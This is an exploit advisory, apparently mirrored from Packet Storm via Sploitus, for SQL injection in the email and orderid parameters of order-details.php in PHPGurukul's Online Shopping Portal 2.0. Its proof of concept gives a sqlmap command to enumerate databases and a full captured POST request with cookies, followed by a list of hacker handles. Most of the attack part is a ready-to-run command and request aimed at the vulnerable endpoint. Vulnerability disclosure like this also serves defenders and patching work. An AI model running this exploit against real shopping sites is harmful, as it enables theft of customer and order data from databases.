Share
## https://sploitus.com/exploit?id=PACKETSTORM:179908
[x]========================================================================================================================================[x]  
| Title : Online Shopping Portal Project 2.0 SQL Vulnerabilities  
| Software : Online Shopping Portal Project  
| Create By : https://phpgurukul.com/author/anujk305/  
| Version : V 2.0  
| Last Updated : 06 June 2024  
| Download : https://phpgurukul.com/shopping-portal-free-download/  
| Date : 03 Agustus 2024  
| Author : OoN_Boy  
[x]========================================================================================================================================[x]  
| Technology : PHP  
| Database : MySQL  
| Price : FREE  
| Description : E-commerce means any transaction over the internet.  
[x]========================================================================================================================================[x]  
  
[O] Exploit  
  
http://127.0.0.1/shopping/order-details.php [email parameter]  
http://127.0.0.1/shopping/order-details.php [orderid parameter]  
  
[O] Proof of concept  
  
create an account and order one of the items, then track your order.  
  
sqlmap.py "YOU RAW DATA" --dbs  
  
[SQL]  
POST /shopping/order-details.php HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 42  
Cache-Control: max-age=0  
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Accept-Language: en-US  
Upgrade-Insecure-Requests: 1  
Origin: http://127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://127.0.0.1/shopping/track-orders.php  
Accept-Encoding: gzip, deflate, br  
Cookie: auth-token-secret=ce668e880e958286436c06776b331b4b; auth-token=cc6dae05ce833672d48f461769dcd56c; PHPSESSID=qnae9mjoqfs22v54k55e1bt1hh  
Connection: keep-alive  
  
orderid=1&email=vrs_hck@maho.id&submit=  
  
[x]========================================================================================================================================[x]  
  
[O] Greetz  
  
BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^  
  
[x]========================================================================================================================================[x]